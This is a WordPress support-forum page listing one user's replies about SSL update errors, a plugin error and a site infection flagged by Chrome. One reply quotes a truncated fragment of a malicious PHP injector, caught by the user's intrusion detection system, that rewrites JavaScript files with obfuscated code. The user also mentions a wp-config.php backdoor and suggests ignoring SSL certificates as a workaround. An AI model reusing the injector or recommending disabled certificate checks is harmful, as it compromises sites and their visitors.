jmtucu
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Update error (plugins and core)Thanks Tara for the reply.
I did that, I update all the plugins manually but it’s very annoying.
Also I delete everything and re-installed WP but without lucky, also in my local environment is failing.It’s weird because I’ve another WP running in the same hosting, but this one is failing for some reason 🙁
If you check the “Ignore SSL certificate” it work fine.
Same problem here
Diagnosis.php says:
There seems to be a problem Try enabling the compatibility options of the plugin WP_Error Object ( [errors] => Array ( [http_request_failed] => Array ( [0] => SSL certificate problem: unable to get local issuer certificate ) ) [error_data] => Array ( ) )The SSL module in the server works well.
Forum: Plugins
In reply to: Facebook Page Publish giving errorSame problem here, also with the plugin of Twitter.
Forum: Fixing WordPress
In reply to: Malware Detected by ChromeI’ve the same problem, my IDS detect the attack
POST.HOST set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x...You have to clean all the js files of your wordpress installation. Also, you need to check the wp-config.php, the virus add a backdoor at the end of the file.
I’m still looking a best solution to this…
It’s a WordPress security issue?